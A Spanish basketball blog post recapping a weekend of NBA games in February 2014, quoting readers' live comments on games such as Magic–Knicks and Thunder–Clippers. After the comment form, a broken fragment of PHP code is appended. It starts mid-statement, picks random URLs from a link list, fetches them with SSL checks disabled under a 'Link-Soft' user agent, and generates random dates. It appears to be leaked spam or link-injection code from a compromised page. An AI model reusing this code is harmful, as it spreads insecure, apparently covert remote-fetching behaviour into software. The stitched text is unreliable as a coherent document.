Informe del fin de semana: Las pilas bien cargadas

24 de February de 2014 por TheDeerHunter

Sensacional. No hay palabras para agradeceroslo. Información en tiempo real y todo. Os pedíamos “volver al redil” y de qué manera lo habéis hecho. Vamos a recopilar qué es lo que ha acontecido en la liga estos días.

La madrugada del viernes al sábado teníamos cobertura en directo tanto del Knicks@Magic como del Spurs@Suns. Carrusel deportivo en TJNBA. Inmenso.

“Partidazo el que estamos viendo entre Magic y Knicks. Con empate a 106, Melo ha tenido un error infantil al pisar la linea de banda y perder la pelota. Ahora los Magic tienen bola para ganar. (…) Partido a la prórroga.”

“(Por los Knicks) sólo Anthony en la faceta anotadora, Chandler en la defensiva y Hardaway dan el callo (…) Por los Magic, partidazo de Oladipo, especialmente desde el último cuarto, bien secundado por Harris y Afflalo. La salida de Davis no supone de momento un importante aumento en los minutos de Nicholson y O’quinn.”

“Otra prórroga con otro tiro fallado por Vucevic, pero esta vez a un metro del aro tras un gran pase de Oladipo (…) Después de casi 3 horas, se acabó, 129-121 para los Magic tras 2 prórrogas.” Denise

Como nos contaba nuestro compañero, Carmelo Anthony estuvo demasiado solo y tuvo que ver como sus 44 puntos, 11 rebotes y 4 asistencias no servían para nada. Empiezan a oirse críticas virulentas contra Woodson porque además de la lamentable imagen del equipo tiene toda la pinta de que los playoffs se escapan irremediablemente. Sin rondas, la temporada no puede ser más calamitosa. 

“Estos Suns de dónde salen? de 20 a los Spurs a falta de 3 minutos para el tercer cuarto… No, si al final pillan cabeza de serie y todo(…) Eso sí, la defensa de SAS parece la apertura de puertas de las rebajas”

Pues no sabemos si es más increíble lo de los Suns o la imagen que dejaron los Spurs. En los soletes, partido algo flojo de los más habituales pero salieron de la nada Ish Smith y Archie Godwin y la liaron.

Comentásteis también el 33-10 de Al Jefferson en la victoria de los Bobcats ante Pelicans, la victoria de los Mavs en Philadelphia a pesar del 30 puntos, 13 rebotes y 6 asistencias de Thaddeus Young (que se va a cebar muchísimo lo que queda de temporada), la nueva derrota y el nuevo mal partido de Kyrie Irving en Toronto, la victoria vital de Detroit ante Atlanta y la de Memphis ante los Clippers. Tampoco se quedó sin comentar el palizón de los Bulls a Denver a pesar del buen debut de Aaron Brooks. Después veríamos la victoria de los Blazers ante Utah, a pesar del 25-10 de Enes Kanter.

El sábado la cobertura en directo pasaba al Timberwolves@Jazz y también al Grizzlies@Bobcats.

“¡Atención al triple doble que se va a marcar Love! (…) ya se puede sentar. 37 12 10 (…) el primer triple doble de su carrera” Nacho

Nueva brutalidad de Kevin Love aunque resulta curioso que no hubiera conseguido anteriormente ningún triple doble. Además por una vez estuvo bien acompañado por el resto del equipo. Kanter otra vez anotó 25 puntos y otra vez perdió.

“Faltaba que diga que jefferson va para mejor pívot de la liga para que se despache con 6 puntos, aunque 9 rebotes, igualmente victoria de mérito para los bobcats frente a nada menos que memphis y ambos venian de noches consecutivas” Esteban.

El ritmo infernal que mantienen los equipos de playoffs en el Oeste no permite tropiezos y los Grizzlies continúan haciendo la goma. Con Marc controlando bien a la estrella de los Bobcats se esfumó una ocasión magnífica para lograr la victoria. Esta vez fue Kemba Walker el ejecutor.

También asistimos al festival de Nene ante Anthony Davis y los Pelicans, incluido un mate para ganar. Si el día anterior debatíais sobre los peores titulares por posición de la liga, habría que tener presente a Stiemsma que “subió su caché” gracias a la defensa en esa jugada decisiva. Partidazo de Anthony Morrow en su debut con New Orleans.

Nueva decepción de unos Knicks que resucitaron a Atlanta. No sirvieron ni los 35 puntos de Melo, ni los 23 rebotes de Chandler, ni las 10 asistencias de Felton. Jeff Teague volvió por sus fueros y Demarre Carroll y, sobre todo, Mike Scott hurgaron desde el banco  en la herida de los de la gran manzana. A destacar también el partidazo en Milwaukee, donde los locales plantaron cara a los líderes gracias a la gran actuación de Brandon Knight. También en Oakland, donde vimos a un Jermaine O’Neal renacido liderando a los Warriors ante los Nets. Por su parte, los Mavs ganaron en Detroit y los Kings en Sacramento a los Celtics.

El domingo “el carrusel” se iba al Thunder@Clippers:

“Puñetazo encima de la mesa de los Clippers ganando en la casa de los OKC, 117-125. Tremendo partido de Crawford con 36 puntos, y anotando un triple y una canasta de 2 suspendiendose desde la linea de tiros libres, ambas decisivas para ganar el partido. Bien secundado por un sensacional Matt Barnes y la buena dirección de Paul.” Denise

Comentábais además que están en disposición de firmar a Glen Davis y, quizá, a Danny Granger. En tal caso diría que ellos serían los verdaderos ganadores del cierre de mercado y puede que favoritos para ganar la conferencia al menos.

También veíamos la exhibición de Rudy Gay e Isaiah Thomas para que los Kings destrozaran a los Nuggets, el palizón de los Heat a los Bulls a pesar de jugar sin LeBron, las victorias de los Wizards en Cleveland y de los Raptors ante Orlando, el histórico debut de Jason Collins con los Nets después de haber salido del armario…

Por encima de los anteriores anoche destacó la decisiva victoria de los Rockets en Phoenix con triplazo ganador de Patrick Beverley y la de los Blazers ante Wolves. Gran partido de Thomas Robinson y muchos minutos para Claver, por cierto.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>